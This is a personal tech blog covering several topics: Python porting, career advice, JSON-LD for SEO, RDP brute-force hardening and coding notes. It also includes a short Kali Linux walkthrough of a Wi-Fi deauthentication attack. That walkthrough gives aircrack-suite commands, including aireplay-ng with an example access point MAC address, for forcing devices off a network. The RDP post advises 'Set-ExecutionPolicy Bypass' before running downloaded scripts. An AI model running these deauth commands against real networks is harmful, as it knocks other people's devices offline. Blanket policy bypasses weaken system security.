Porting My Python 3 Scraper Script Over to my Kali Linux VM

This is republished from my old Blogger blog but I can’t find the original Python script blog article. I’ll be back soon to post the content for the original article if I’ve kept good enough notes. Argh!

I didn’t know what else to call the title but this is what I’m doing…

I wrote a Python scraper script; see my previous blog posts on how to do this yourself.

So I’m a little further down the road in my training and want to take that script written on my Windows PC using Python 3 and run it on a Kali Linux VM which apparently is running Python 2.7.

So as with all things tech, it won’t run without some tweaking.

This is how I got it to work.

First, there is a difference in how you execute Python scripts in Linux. Kali Linux seems to have several versions of Python installed by default. The python2.7 install looks like the one where most of the goodies are, including the BeautifulSoup package my scraper needs, so I’m using that one.

Example of how to call python2.7 then pass the script that is located in the “Desktop” folder to it.

I only had to update one line of code, and that was the reference to urllib.

Why? Because the Python 2 urllib and urllib2 modules were reorganized into urllib.request, urllib.parse and urllib.error in Python 3.x. Those newer modules do not exist in Python 2.x.

We are going backwards in version, so the import has to point back at urllib2.

Old code: from urllib.request import urlopen as uReq

New code: from urllib2 import urlopen as uReq
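
If the same script needs to run on both the Windows PC and the Kali VM, one common pattern is to try the Python 3 import first and fall back to the Python 2 one. This is only a minimal sketch, and it assumes nothing else in the scraper depends on the Python version:

```python
# Try the Python 3 location first, then fall back to the Python 2.7 module
try:
    from urllib.request import urlopen as uReq  # Python 3.x
except ImportError:
    from urllib2 import urlopen as uReq  # Python 2.7

# Either way, the rest of the script can keep calling uReq(url)
print(uReq.__module__)
```

With this in place the rest of the script does not need to know which interpreter it is running under.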

Kali Linux: Wi-Fi Deauth Attack

What is a “Deauth Attack”?

This article on deauthentication (Deauth) attacks on Hackernoon is a good starting point.

https://hackernoon.com/forcing-a-device-to-disconnect-from-wifi-using-a-deauthentication-attack-f664b9940142

A Wi-Fi deauthentication attack is a Denial of Service (DoS) attack carried out over Wi-Fi by flooding the air with deauthentication frames that spoof the MAC address (BSSID) of the target network’s access point.

This attack results in an interruption in service for wireless devices by forcing them to disconnect from the target network.

As the device tries to reconnect, we continue to send deauth packets. Even if the device does reconnect briefly, the next deauth frame it receives forces it to disconnect again.

If the attacker is relentless, your only option is to change your SSID, but they can just pick it up again and repeat the process.

Kali Linux Commands You Might Need

#Tail command: tail prints the last lines of a file to the screen

#Use the tail command to read a file and display the end of it on the screen

Example: tail -f -n 0 /var/log/messages

#-n is the number of lines to show (default is 10). With -n 0 no existing lines are shown, so combined with -f you get a live feed of new text only.

#-f is the “follow” option: output appended data as the file grows

#Get more help with tail by typing man tail.
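
To make the -n option a bit more concrete, here is a rough Python sketch of the “last n lines” part of tail. The function name last_lines and the throwaway temp file are my own inventions for illustration; this is not how tail itself is implemented.

```python
import os
import tempfile
from collections import deque


def last_lines(path, n=10):
    """Return the last n lines of a text file, similar in spirit to `tail -n`."""
    with open(path, "r") as handle:
        # A bounded deque keeps only the most recent n lines as it reads
        return list(deque(handle, maxlen=n))


# Build a throwaway 20-line file so the sketch runs anywhere
with tempfile.NamedTemporaryFile("w", suffix=".log", delete=False) as tmp:
    tmp.write("".join("line {}\n".format(i) for i in range(1, 21)))

print(last_lines(tmp.name, 3))  # the final three lines of the file
print(last_lines(tmp.name, 0))  # nothing, like -n 0 before any new data arrives
os.remove(tmp.name)
```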

#Network Config

ifconfig

#Wireless Config

iwconfig

iwconfig eth0 freq 2422000000
iwconfig eth0 freq 2.422G
iwconfig eth0 channel 3
iwconfig eth0 channel auto

Pasted from <http://www.linuxcommand.org/man_pages/iwconfig8.html>

Note: Set the country code on the wireless card before modifying the transmit power. My USB wireless card had to have the country set before it would let me change the transmit power.

#Setting the transmit power. The example below uses iwconfig; iw is another tool used to manipulate wireless properties.

iwconfig [interface] txpower [value]

#Example: iwconfig wlan0 txpower 25

iw

#Airmon Wireless Monitor

Use airmon-ng to set up a monitor

  • airmon-ng start [interface]
  • Example: airmon-ng start wlan0

#Run the command below if you are having problems with other processes when trying to run airmon-ng

  • Example: airmon-ng check kill

#Airodump Wireless Network Monitor

Use Airodump to monitor wireless networks.

Starting airodump

  • airodump-ng [interface]
  • Example: airodump-ng wlan0mon (dumps the data from the monitor interface created in the previous step)

Press Ctrl + c to stop airodump-ng

The result is a monitor on wlan0 which shows as interface wlan0mon

#In the example below, the -0 represents “Type of Attack” = Deauthentication

#The 220 is the number of deauthentication bursts to send (0 means keep sending until stopped)

#followed by -a with the MAC address (BSSID) of the target access point and the interface that airmon-ng put in monitor mode.

aireplay-ng -0 220 -a [MAC Address] [interface]

Example: aireplay-ng -0 220 -a A0:63:91:A6:84:36 wlan0mon

A Career in IT: Get Used to Saying Goodbye

It’s Saturday night and I’m reflecting on a conversation I had with a good friend, mentor and former teammate last night about staying motivated and embracing change in an IT career, especially later in your career.

I told him to get used to saying goodbye to things and people. This includes letting go of things like projects, systems, roles and code bases as your career progresses in a large enterprise or similar organization.

My friend and I are both Navy veterans and have worked at the same civilian employer for quite a while. Our employer when we started was much smaller than the huge enterprise it has grown into.

We joke about it, but it is probably true that our teams have been reorganized at least 6 times in the last 10 years. That is a lot of churn and change inside an operation.

As a result of all that churn, there has been a lot of anxiety about everyone’s roles, but on the flip side there have also been lots of opportunities to move around.

I’ve held at least 7 titles in the last 16 years. I’ve not stayed in a role more than three years. Luckily, all my moves have been up, and for the last couple of roles I was recruited. I’m at the end of one big thing and by January will most likely be moving to a new project or role. The future is still bright.

My friend, on the other hand, stayed on the engineering team that I had left for my current role. His teams have changed a few times due to reorganizations, but he has essentially been doing the same job for many years and may be feeling rudderless and unfulfilled.

These are the two perspectives that are the background for the rest of this article.

Over time, if you don’t feel challenged, grow professionally or have many “wins” under your belt, you’re not going to feel very good about what you’re doing and a lack of motivation will set in.

My advice was to fight that lack of motivation and approach every project, meeting or networking opportunity with a positive outlook or else you just might miss that one connection or event that changes your life or career for the better.

Change is scary and apprehension breeds resistance to change. Sometimes, we resist change simply because it’s uncomfortable. As a result, we miss out on new opportunities to improve ourselves or make career connections that will lead us to our next gig or boss, resulting in a better and more fulfilled life.

Is a lack of self-confidence to blame? That one requires some self-reflection to answer. However, sometimes that same fear of the unknown, or simple comfort, causes people to cling to old roles, systems and code bases because they can become comfortable places to rest in the chaos.

We can get burned out in IT; I’ve hit burnout several times. It’s OK to rest and take a break now and then, but you gotta keep pushing yourself to get a little better every day and keep an eye out for opportunities to grow yourself and make a difference in the world with your IT skills.

If you want any chance of feeling fulfilled by what you’re doing in your job / career, you have to find something that drives you at your core and find a way to tie it to what you do every day so you have a driving force and compass to guide you. The rest will become autopilot.

If you can’t do that, time to do something else. Life’s too damn short not to.

-Regards,
Rick

This Week in SEO w/ Rick Cable for Week Ending 10/25/2019

There is a lot going on in SEO this week.

Barry Schwartz over at Search Engine Roundtable is discussing a Google search engine algorithm update on Wednesday, October 24th.

On my site, FinditClassifieds.com, I initially saw a slight increase in organic traffic from Google after the 10/24/2019 update. However, the new JSON-LD code I’ll be discussing later in the article was generating HTTP 500 server errors, which caused Google to pause displaying pages from the domain in both organic search results and Google Ads (CPC) at the exact same time. Hopefully, this is only temporary and our organic search momentum can be picked up where we left off.

This suggests that both the organic search side and the paid Google Ads (CPC) side use Googlebot HTTP 500 server error results as a flag for a domain and/or sub-domains and reduce traffic to them.

I looked around and found this information-packed article that covers how Google Search uses Googlebot 500 error results to remove problem pages or domains as soon as issues are detected.

MY FIRST JSON-LD IMPLEMENTATION W/ LESSONS LEARNED

A Background Video on JSON-LD

You would implement JSON-LD to make sure Googlebot, in this case, can pick up on product details such as the product name, description and price. JSON-LD helps provide context for the information Googlebot spiders on your site.

My implementation of JSON-LD was done on the local classifieds page. This JSON-LD example was a list of items for sale in a classified ads page for the Modesto, California metro area.

JSON-LD Code Example / Server Side Code Generates the Script Block

The system I’m patching to add the JSON-LD is running on Classic ASP, which is probably closest to PHP or C# Razor syntax. The language and/or framework doesn’t matter that much; it’s the idea / solution that counts.

This example is a mix of front-end JavaScript (the JSON-LD script block) and ASP VBScript, which takes care of looping through the recordset to get the values needed to fill in the JSON-LD.

To me, JSON is a fairly simple concept of transporting data in a simple key/value pair format.

The trickiest part I found about constructing a well-structured and acceptable JSON-LD message is the nesting syntax when outputting multiple records at a time and making sure that we don’t have duplicate keys in the key/value pairs.

In my case, I had to construct the JSON-LD block inside a server side code block where we are looping through a recordset and outputting the fields related to the JSON-LD from the local classifieds ad table.

Notice how I’ve got @context outside the loop, as it is the same for every record. The outer @type describes the list itself, while each record inside the loop gets its own @type of Product.

So output the values that are the same for every record once, then nest the rest of the output in a block inside it using [ ] and { } as seen in the example below. Keep the closing ] and } outside the loop and put a comma between items, never after the last one, or the result will not be valid JSON. Feel free to check out the output from the live site anytime. :-)

http://modesto.finditclassifieds.com/misc-classifieds/local-search.asp

<script type="application/ld+json">
{
	"@context" : "http://schema.org",
	"@type" : "ItemList",
	"itemListElement" : [
<%
' Track the first item so a comma is written between items, never after the last one
Dim isFirstItem : isFirstItem = True
While NOT Recordset1.eof
	if InStr(Recordset1("Category"),"service") = 0 then
		if NOT isFirstItem then Response.Write(",")
		isFirstItem = False
%>
	{
	"@type" : "Product",
	"name" : "<%=Replace(Mid(Recordset1("ItemDescription"),1,40),vbCrLf,"") & " in " & Recordset1("City") & ", " & Recordset1("State")%>",
	"description" : "<%=Replace(Replace(Mid(Recordset1("AdText"),1,120), vbCrLf, ""),vbTab,"")%>",
	"offers" : {
		"@type": "Offer",
		"url": "<%=SiteURL%>/misc-classifieds/listings-detail/adid/<%=Recordset1("ID")%>/description/<%=Server.URLEncode(Replace(Mid(Recordset1("ItemDescription"),1,25),vbCrLf,""))%>",
		"priceCurrency": "USD"
		}
	}
<%
	end if
	Recordset1.MoveNext
Wend
Recordset1.MoveFirst
%>
	]
}
</script>
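
One way to sidestep hand-built nesting, comma and quoting problems is to build the structure as native data and let a JSON library serialize it. Below is a minimal Python sketch of that idea, not the code running on the live site. The ads rows, SITE_URL and build_json_ld are hypothetical stand-ins for the recordset, and wrapping the products in an ItemList is my assumption about a reasonable container.

```python
import json

# Hypothetical rows standing in for the classifieds recordset
ads = [
    {"id": 101, "title": "Oak dining table", "city": "Modesto", "state": "CA",
     "text": 'Solid oak, seats 6, 60" long', "category": "furniture"},
    {"id": 102, "title": "Lawn mowing", "city": "Modesto", "state": "CA",
     "text": "Weekly service", "category": "services"},
]

SITE_URL = "http://example.com"  # placeholder, not the real site URL


def build_json_ld(rows):
    """Build one JSON-LD document with a Product entry per non-service ad."""
    items = []
    for row in rows:
        # Skip service listings (case-insensitive here, which is my choice)
        if "service" in row["category"].lower():
            continue
        items.append({
            "@type": "Product",
            "name": "{} in {}, {}".format(row["title"][:40], row["city"], row["state"]),
            # Collapse line breaks and tabs into single spaces
            "description": " ".join(row["text"][:120].split()),
            "offers": {
                "@type": "Offer",
                "url": "{}/misc-classifieds/listings-detail/adid/{}".format(SITE_URL, row["id"]),
                "priceCurrency": "USD",
            },
        })
    document = {
        "@context": "http://schema.org",
        "@type": "ItemList",
        "itemListElement": items,
    }
    # json.dumps handles commas, brackets and escaping of quotes in the ad text
    return json.dumps(document, indent=2)


json_ld = build_json_ld(ads)
print('<script type="application/ld+json">\n{}\n</script>'.format(json_ld))
```

The point of the design is that an ad containing a double quote or a stray line break can no longer break the whole block, which is the kind of error that is easy to miss when concatenating strings by hand.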

SEO Videos & Articles of Note for Week Ending 10/25/2019.

Here are the best SEO related videos and articles I could find to share with you this week!

Marie Haynes Search News Podcast – Oct 23rd 2019

Video: SEO This Week Episode 139 – Coding, Links, Mapping

Video: SEO Fight Club Episode 38 – Rank Tracking Problems

Video: Barry Schwartz Interview w/ Eric Enge of Stone Temple Consulting in Boston

3 Low Cost Ideas to Address RDP Brute Force Attacks on Your Windows Web Server

It’s late at night and I’m remoted in to my Windows web server. I’m reviewing the event logs and see something suspicious: audit failures in the Security event log.

The next 7 hours had me consumed with learning everything I could about “Brute Force RDP Attacks” and trying to apply it to my server ASAP.

Before I go any further, I want to reiterate that this is a hobby server I run. This is not a server I work on for my day job in a large enterprise environment. Hence the focus on low cost solutions.

First, Remote Desktop Protocol (RDP) is probably one of the most commonly unsecured services on Windows web servers, which is why your server is going to be relentlessly pounded by scanning tools and hackers trying to get in via RDP, usually on port 3389.

Video: Brute Force Attack with Hydra Hacking Tool

I could just block port 3389 and move on with my life but I personally prefer to access this particular server via RDP to handle administrative tasks. Everything else is done via FTP or telnet.

I run all my hobby servers on a super tight budget. This article will discuss what I learned and how I applied that knowledge to mitigate some of the risk associated with managing Windows servers exposed to the Wild Wild West (WWW) with RDP connections using techniques that are no cost except for your time to implement.

Low Cost Ideas for Mitigating RDP Brute Force Attacks on Your Windows Servers

  1. Use Strong Passwords
    • Strong passwords are your first and best defense for any RDP brute force attack.
      • Use a password with a length of 12 characters or more.
      • Don’t use words that can be found in a dictionary
      • Use a combination of UPPER CASE, lower case, numbers and special characters
      • Be Social Media aware! Don’t use friends, family, pets or info that could be derived from Social Media posts.
  2. Clean Up Old User Accounts
    • Make sure only the accounts you need are on your server.
    • Fewer accounts reduces possible attack vectors.
    • Also validate the level of access of the accounts on your server.
  3. Update Windows Firewall Rules
    • Exclude IP Ranges for Countries with highest amount of hacking.
    • See steps below for updating your Windows Firewall configuration to block IP ranges for China, Russia and North Korea.

Before You Mess with Your Firewall

The PowerShell script I cover below worked great, but then I decided to build a firewall rule manually for South American IP addresses and re-learned a very important lesson about working with firewalls.

A word of caution: Don’t build your Firewall IP restrictions manually.

Always script them out in PowerShell. If you’re not 100% awake and paying attention, you will find yourself blocked out of your server and kicking yourself in the ass like I did.

Thankfully, I have a great hosting company, AccuWebHosting, who has been able to un-do all my screw ups so far. I’ve used them happily for many years and highly recommend them. I pay about $500 a year for a decent Windows server VPS with great support.

Use Windows Firewall to Block IP Ranges for China, Russia and North Korea and many others.

The steps to block IP ranges using Windows Firewall are pretty simple.

  1. Create a directory for working with PowerShell and PowerShell Scripts.
    • Example: C:\ip-security
  2. Go to this page and click on the Step 2 link to download your PowerShell scripts zip file.
  3. Extract the contents of the ip-security-package.zip file to your “C:\ip-security” folder.
    • Your folder should look like this:
  4. Open PowerShell from the Command Line as an Administrator so you’ll have the correct rights to make changes to the Windows Firewall.
  5. Run this command to make sure PowerShell is allowed to run the scripts
    • “Set-ExecutionPolicy Bypass”
    • Type “Y” when prompted to accept the change
  6. From the “C:\ip-security” folder, type the following commands to import the IP range exclusions into Windows Firewall. PowerShell only runs a script in the current folder when it is prefixed with .\
    • .\Import-Firewall-Blocklist.ps1 -inputfile china.zone.txt
    • .\Import-Firewall-Blocklist.ps1 -inputfile russia.zone.txt
    • .\Import-Firewall-Blocklist.ps1 -inputfile northkorea.txt
  7. You should now have IP blocks in your firewall.
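
Given how easy it is to lock yourself out, it can be worth checking that your own IP address is not inside a block list before importing it. Here is a minimal Python sketch of that check. It assumes the zone file holds one CIDR range per line; the sample ranges are documentation-only addresses, and the helper names load_networks and is_blocked are made up for this example.

```python
import ipaddress


def load_networks(lines):
    """Parse CIDR ranges, one per line, skipping blank lines and # comments."""
    networks = []
    for line in lines:
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        networks.append(ipaddress.ip_network(entry, strict=False))
    return networks


def is_blocked(ip, networks):
    """Return True if the IP address falls inside any of the networks."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in networks)


# Sample data using reserved documentation ranges, not a real country list
sample_zone = ["# sample zone file", "192.0.2.0/24", "", "198.51.100.0/24"]
networks = load_networks(sample_zone)

print(is_blocked("192.0.2.15", networks))   # inside the first range
print(is_blocked("203.0.113.9", networks))  # not in either range
```

To use it against a real file, the lines could come from open("china.zone.txt") instead of the sample list, and the address to test would be the public IP you connect from.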

If you’ve done these three things, your web server is better prepared than most.

Some Closing Thoughts on Web Server Security

Security on the internet is hard and ever changing. Running your own server for your hobby or side hustle can be done but can be very frustrating and overwhelming at times. Do as much of what I covered as you can.

We covered a few options above, but if you get nothing else from this article, make sure your passwords are long and hard to guess as this is the last defense before a bad guy gets access to your system.

From meetings I’ve been in with Enterprise engineers, passwords of 12 characters or more are best. Rainbow table attacks can typically crack most common passwords of fewer than 12 characters. Scary, right?

Don’t use passwords made from words that can be found in a dictionary and, now with the new world of social media, avoid using your kids’, significant other’s or pet’s names or other references that can be guessed from online posts.

In one of the attacks that prompted me to write this article, one attacker used my youngest son’s full name. I don’t use Facebook anymore, so there are only a few places you could go to figure that out.
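
The password rules from this article are simple enough to sketch as a quick check. The Python below is only an illustration of those rules: the function name password_issues and the sample passwords are made up, and it does not attempt a real dictionary-word check.

```python
import string


def password_issues(password, personal_terms=()):
    """Return a list of rule violations; an empty list means no issues found."""
    issues = []
    if len(password) < 12:
        issues.append("shorter than 12 characters")
    if not any(ch.isupper() for ch in password):
        issues.append("no upper case letter")
    if not any(ch.islower() for ch in password):
        issues.append("no lower case letter")
    if not any(ch.isdigit() for ch in password):
        issues.append("no number")
    if not any(ch in string.punctuation for ch in password):
        issues.append("no special character")
    # Names of family, pets and so on that could be found on social media
    lowered = password.lower()
    for term in personal_terms:
        if term and term.lower() in lowered:
            issues.append("contains personal term: {}".format(term))
    return issues


print(password_issues("vT7#qLz9!mXw2$"))
print(password_issues("Buddy2019", personal_terms=["Buddy"]))
```

Passing the check does not make a password safe on its own; it only catches the obvious problems covered above.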

I hope this story helps someone else on their IT Journey.

Regards,
Rick Cable
Lost in the Cyber Abyss

References:

https://www.gregsitservices.com/blog/2016/02/blocking-unwanted-countries-with-windows-firewall/

http://www.ipdeny.com/ipblocks/

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-6

C# Generics: Digesting Tim Corey’s C# Generics Video


Tonight, I’m completing a learning session on C# Generics. I’m using Tim Corey’s YouTube video on C# Generics as my tutorial.

You can get all the files to go along with Tim Corey’s C# Generics video at Tim’s web site for the cost of providing Tim with your email address for his email list. You can unsubscribe anytime.

Below is Corey’s video. Watch it, then, if you’re still interested, read my personal training notes, which will be shared below. They might help you if you’re feeling stuck or want to cement an idea in your own mind.

Tim Corey’s C# Generics Video

How to Get Started Programming in Python / Python Crash Course

Crash Course in to Python Programming

I had really been wanting to find a couple of hours to do a crash course on python and finally found an opportunity to do it last night.

Having been a programmer for a while, I’m finding many of the Python videos quite boring. They are aimed at absolute beginners and have you plodding through the basics of programming, which makes learning a new programming language painfully slow.

Luckily, I had found this great Python primer video by Derek Banas on YouTube.

I followed along and completed all the code in the video and had working examples of most of the important code snippets for much of how stuff gets done in Python. Success was not without some pain; see problems and resolutions below.

Video: Learn Python in One Video

I will save you some pain by telling you there is a very frustrating code issue at the end of this long video.

See code fix below.

When you are in the Dog class referencing the Animal super class, from which it inherits the name, weight, height and sound properties, you have to use the getter methods instead of the “self” reference like we could inside the Animal class. The reason is Python’s name mangling: an attribute written as self.__name inside Animal is actually stored as _Animal__name, so self.__name inside Dog looks for _Dog__name, which does not exist. Once you change that, the code works.

For the Dog class, the toString() method only worked for me as written in the example below:

def toString(self):
        return "{} is {} cm tall and {} kilograms, says {} and owner is {}".format(
                                                                    self.get_name(),
                                                                    self.get_height(),
                                                                    self.get_weight(),
                                                                    self.get_sound(),
                                                                    self.__owner)
...instead of this version, which doesn’t work:
def toString(self):
        return "{} is {} cm tall and {} kilograms, says {} and owner is {}".format(
                                                                    self.__name,
                                                                    self.__height,
                                                                    self.__weight,
                                                                    self.__sound,
                                                                    self.__owner)
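
The difference between the two versions comes down to how Python 3 handles attribute names that start with two underscores. Here is a stripped-down sketch that shows it. The class and method names are simplified stand-ins of my own, not the exact code from the video.

```python
class Animal:
    def __init__(self, name):
        self.__name = name  # actually stored as _Animal__name

    def get_name(self):
        return self.__name


class Dog(Animal):
    def __init__(self, name, owner):
        super().__init__(name)
        self.__owner = owner  # actually stored as _Dog__owner

    def broken(self):
        # Inside Dog this is rewritten to self._Dog__name, which was never set
        return self.__name

    def working(self):
        # The getter runs inside Animal, so it finds _Animal__name
        return "{} is owned by {}".format(self.get_name(), self.__owner)


spot = Dog("Spot", "Rick")
print(spot.working())

try:
    spot.broken()
except AttributeError as error:
    print("AttributeError:", error)

# The real attribute names stored on the object
print(sorted(vars(spot)))
```

The last line lists the attribute names as Python really stores them, which makes it clear why the Dog class cannot see the Animal values through self.__name.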

As a bonus I would add watching this video to help solidify the idea of polymorphism if you’re having difficulty getting a grasp of it.

Hope this helps someone!

Video: What is Polymorphism?

Rick’s Picks: Top 5 Software Developer Podcasts

About 3 years ago I took on a challenging role as a developer at a start-up that had me doing a 3-4 hour daily commute, 5 days a week.

I’m working from home a lot more now but I did this grueling commute for at least 2 years. I still commute now, just less frequently. I learned to fill my time with lots of technical information, mainly podcasts.

It took a while to nail it down, but I felt I got the most out of my drive time when I made myself research virtually every unfamiliar term or concept I heard on the podcasts. Initially, it was exhausting, but slowly over time I was looking things up less and less, and impostor syndrome visited less and less. 🙂

Here is a list of the top 5 software development podcasts that I found helpful in my journey as a web / software developer.

Have a favorite developer podcast you didn’t see on my list? Drop me a line or leave a comment with your favorite.

Callback Functions in Javascript – Explained!

I’m working on a project and the topic of Javascript callback functions came up. I’m sure I’ve come upon this in the past but never spent a lot of time thinking deeply about it.

I’ve seen a lot of videos and blogs about Javascript callback functions, but most say they are hard to explain.

I’ve just spent 2 hours digging in and here is the easiest way I can explain them to anyone.

A Javascript callback function is just a function that we pass in to another function as an argument. Inside the receiving function, the parameter (often named callback) is a placeholder: once we inject our function, calling callback runs the function we passed in, so “in our minds” we can substitute callback with the name of that function when reading the code logic.
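
The idea is not unique to Javascript; it works in any language where functions can be passed around like values. Here is a small sketch of the same “placeholder” idea written in Python rather than Javascript, with made-up function names:

```python
def greet(name):
    return "Hello, {}!".format(name)


def shout(name):
    return "HEY {}!".format(name.upper())


def process_user(name, callback):
    # callback is the placeholder: it runs whichever function was passed in
    return callback(name)


print(process_user("Rick", greet))                    # read it as greet("Rick")
print(process_user("Rick", shout))                    # read it as shout("Rick")
print(process_user("Rick", lambda name: name[::-1]))  # an inline callback
```

Notice that process_user never needs to know which function it was handed; it just calls the placeholder.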

I will be back soon to elaborate and provide you with examples.

-Regards Rick

Here are some good references I’m looking at now.
http://recurial.com/programming/understanding-callback-functions-in-javascript/

Video:

Google reCAPTCHA Privacy and Terms of Service links not Working in Internet Explorer 11 (Explained)

I’m sharing this story as it is something you might encounter when using Internet Explorer 11 with Google’s CAPTCHA service (code). 

This came up in UAT testing recently for a web product I work on so I thought I would share.  It might save you some time explaining to your customers about cross browser compatibility testing.

First off, Google has a free service for trying to detect bots on your site. It is a type of “CAPTCHA”, which is an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”.

Google’s free CAPTCHA service, called reCAPTCHA, requires developers to register their website to get an API key, which is used along with some code to call the API from the site.  Pretty cool stuff, right?

I’m really simplifying this but to render the reCAPTCHA you would insert their code snippet. Make sure the code is loading from a page using the HTTPS protocol or else it might not work.

<html>
  <head>
    <title>reCAPTCHA demo: Simple page</title>
     <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  </head>
  <body>
    <form action="?" method="POST">
      <div class="g-recaptcha" data-sitekey="your_site_key"></div>
      <br/>
      <input type="submit" value="Submit">
    </form>
  </body>
</html>

Once the reCAPTCHA is loading on the page, it will be loading its contents in an IFRAME. This is really important to our story!

There are links in the Google reCAPTCHA that point to a privacy page and a terms of service page on the Google.com domain, and both links have a target="_blank" attribute. This means these links should open in a new window or tab, depending on the browser settings and any modifier keys pressed.

The links are working just fine in Chrome and Firefox and opening in new windows, but not in IE 11.

What is the issue here?

It could have been earlier than IE 11, but Microsoft implemented a security feature that restricts links inside IFRAMEs from linking out to a domain other than the one the page originally loaded from.

The page hosting the CAPTCHA loads from your WhatEverDomain.com, but all the links in the IFRAME point to the Google.com domain, so they are all disabled.

References:

https://github.com/google/recaptcha/issues/191

https://answers.microsoft.com/en-us/ie/forum/ie11-iewindows_10/links-that-open-in-new-browser-tabs-dont-work-on/55e7b147-bb66-4b4a-b88d-3533166a059a

Here is a video on how to install Google reCAPTCHA for your website. Good luck and happy coding!

Video: Google reCAPTCHA 2.0